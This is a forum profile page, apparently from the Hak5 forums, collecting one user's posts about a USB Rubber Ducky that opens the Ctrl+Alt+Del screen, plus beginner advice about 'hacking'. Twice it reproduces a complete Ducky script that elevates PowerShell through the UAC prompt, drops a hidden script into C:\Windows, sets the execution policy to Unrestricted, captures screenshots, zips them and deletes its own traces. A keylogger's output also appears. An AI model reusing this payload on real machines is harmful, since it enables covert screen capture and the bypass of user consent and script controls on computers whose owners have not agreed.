HelloPoppit

January 28, 2014

The only problem I can think of is that the inject.bin on the sdcard is not getting updated. Have you tried swapping the sdcard?

I tried that, and reformatting both of the sd cards

January 28, 2014

So, today, with a new problem.

EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script

** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr]

[NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] **

That's all that was logged.

HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping.

Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys.

**Example Script**

DELAY 3000

GUI r

DELAY 750

STRING powershell Start-Process notepad -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 500

ENTER

ALT SPACE

DELAY 100

STRING m

DELAY 200

DOWNARROW

ENTER

STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')

ENTER

STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime

ENTER

STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory

ENTER

STRING $date = get-date

ENTER

STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"

ENTER

STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'

ENTER

STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"

ENTER

STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory

ENTER

STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth

ENTER

STRING $displayWidth = $displayInfo.ScreenWidth

ENTER

STRING $displayHeight = $displayInfo.ScreenHeight

ENTER

STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")

ENTER

STRING $x = 0

ENTER

STRING do { Start-Sleep -Seconds 60

ENTER

STRING $jpegName = (get-date).ToString('HHmmss')

ENTER

STRING $image = new-object System.Drawing.Bitmap 1366 ,768

ENTER

STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight

ENTER

STRING $screen = [system.Drawing.Graphics]::FromImage($image)

ENTER

STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))

ENTER

STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));

ENTER

STRING $x++ } while ($x -ne 1);

ENTER

STRING $Report >> $fileSaveDir'/ComputerInfo.html'

ENTER

STRING function copy-ToZip($fileSaveDir){

ENTER

STRING $srcdir = $fileSaveDir

ENTER

STRING $zipFile = '/public\Report.zip'

ENTER

STRING if(-not (test-path($zipFile))) {

ENTER

STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

ENTER

STRING (dir $zipFile).IsReadOnly = $false}

ENTER

STRING $shellApplication = new-object -com shell.application

ENTER

STRING $zipPackage = $shellApplication.NameSpace($zipFile)

ENTER

STRING $files = Get-ChildItem -Path $srcdir

ENTER

STRING foreach($file in $files) {

ENTER

STRING $zipPackage.CopyHere($file.FullName)

ENTER

STRING while($zipPackage.Items().Item($file.name) -eq $null){

ENTER

STRING Start-sleep -seconds 1 }}}

ENTER

STRING copy-ToZip($fileSaveDir)

ENTER

STRING remove-item $fileSaveDir -recurse

ENTER

STRING Remove-Item $MyINvocation.InvocationName

ENTER

CTRL S

DELAY 1500

STRING C:\Windows\config.ps1

ENTER

DELAY 2000

ALT F4

DELAY 200

GUI r

DELAY 500

STRING powershell Start-Process cmd -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 500

STRING mode con:cols=14 lines=1

ENTER

ALT SPACE

DELAY 100

STRING m

DELAY 200

DOWNARROW

ENTER

STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

ENTER

DELAY 1000

STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1

ENTER

****

I just don't know what to do anymore. Someone help.

The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything.

EDIT:: I've also tried the simple " Hello world " script, same result.

ALSO:;

The microSD card wont save any new data?

January 28, 2014

So, today, with a new problem.

Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys.

**Example Script**

DELAY 3000

GUI r

DELAY 750

STRING powershell Start-Process notepad -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 500

ENTER

ALT SPACE

DELAY 100

STRING m

DELAY 200

DOWNARROW

ENTER

STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')

ENTER

STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime

ENTER

STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory

ENTER

STRING $date = get-date

ENTER

STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"

ENTER

STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'

ENTER

STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"

ENTER

STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory

ENTER

STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth

ENTER

STRING $displayWidth = $displayInfo.ScreenWidth

ENTER

STRING $displayHeight = $displayInfo.ScreenHeight

ENTER

STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")

ENTER

STRING $x = 0

ENTER

STRING do { Start-Sleep -Seconds 60

ENTER

STRING $jpegName = (get-date).ToString('HHmmss')

ENTER

STRING $image = new-object System.Drawing.Bitmap 1366 ,768

ENTER

STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight

ENTER

STRING $screen = [system.Drawing.Graphics]::FromImage($image)

ENTER

STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))

ENTER

STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));

ENTER

STRING $x++ } while ($x -ne 1);

ENTER

STRING $Report >> $fileSaveDir'/ComputerInfo.html'

ENTER

STRING function copy-ToZip($fileSaveDir){

ENTER

STRING $srcdir = $fileSaveDir

ENTER

STRING $zipFile = '/public\Report.zip'

ENTER

STRING if(-not (test-path($zipFile))) {

ENTER

STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

ENTER

STRING (dir $zipFile).IsReadOnly = $false}

ENTER

STRING $shellApplication = new-object -com shell.application

ENTER

STRING $zipPackage = $shellApplication.NameSpace($zipFile)

ENTER

STRING $files = Get-ChildItem -Path $srcdir

ENTER

STRING foreach($file in $files) {

ENTER

STRING $zipPackage.CopyHere($file.FullName)

ENTER

STRING while($zipPackage.Items().Item($file.name) -eq $null){

ENTER

STRING Start-sleep -seconds 1 }}}

ENTER

STRING copy-ToZip($fileSaveDir)

ENTER

STRING remove-item $fileSaveDir -recurse

ENTER

STRING Remove-Item $MyINvocation.InvocationName

ENTER

CTRL S

DELAY 1500

STRING C:\Windows\config.ps1

ENTER

DELAY 2000

ALT F4

DELAY 200

GUI r

DELAY 500

STRING powershell Start-Process cmd -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 500

STRING mode con:cols=14 lines=1

ENTER

ALT SPACE

DELAY 100

STRING m

DELAY 200

DOWNARROW

ENTER

STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

ENTER

DELAY 1000

STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1

ENTER

****

I just don't know what to do anymore. Someone help.

The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything.

EDIT:: I've also tried the simple " Hello world " script, same result.

January 27, 2014

Nopes, that wasn't the issue. Got a credit card now so the topic can be closed. haven't bought my ducky yet. I'm still figuring out how it exactly works. Got the payloader in my kali machine yet but i'm still figguring out how to make my own .bin files from a notepad in windows 8 so any help is very welcome here!

This is a old topic, but I figured I'd let you in on how to, cause it's easy.

Once you have your script, plug your microsd card into your computer through a adaptor, then go into your notepad, click ' save as ' then go into the sd card from the pop up window and type " inject.bin " it will ask you to replace the current file, click yes. Done.

January 26, 2014

I disagree with what most of these people said. I personally found that learning a scripting language was the most wasteful time of my life. Since you are on a hak5 forum, I suggest buying the rubber ducky. Besides that, there's nothing that you really need to buy to start " hacking " for the record, there's no such thing as " White hat hacking " it's all just black hat, just a personal opinion, you could probably go and prove me wrong though. You honestly can't know everything by reading a book. It takes time to slowly learn stuff. I do want to make sure you acknowledge this, hacking will disappoint you. It's nothing like people think it is.

I advise you buy McAfee, though. Dealing with hacking community's you will often download a virus or two, nothing to be afraid of.

Start writing windows batch files, they are fun. Also, check out this forum -( Hackforums.net )- just don't make another post like this there.

I hope this helped a little bit.

January 24, 2014

1) Do you know what firmware you are running?

2) What is your script?

3) What version of the Encoder

4) Have you read the FAQ / Guide

1. Whatever came on the Ducky ( purchased dec 22nd 2013 )

2 The script came from online, it was to just make a new user. But I used different scripts and they all worked.

3 what encoder? The script I wrote was from online and you just download it. Could I get a download link to the encoder?

4. Yes. I'm wondering if I did something wrong when replacing the inject.bun

January 24, 2014

So, I just recently got my ducky, and when I downloaded and ran a few commands I decided to make my own. After trying it, it didn't work, so I went to go and run one I had already ran ( That did work ) and now when I plug my ducky in, all it does it flash green with almost no break in-between. Help!

Can someone give me a full explanation on how to use this? And how to fix it.. Thanks :unsure:

Sign In

HelloPoppit

Posts

Joined

Last visited

Content Type

Profiles

Forums

Posts posted by HelloPoppit

All Ducky scripts lead to 'CTRL + ALT + DEL' screen

Rubber ducky opening 'ctrl + alt + del' screen every time

All Ducky scripts lead to 'CTRL + ALT + DEL' screen

searching for ducky (paypal)

Where to start! :) NEWBIE HERE

Ducky just flashing green?

Ducky just flashing green?

Browse

Activity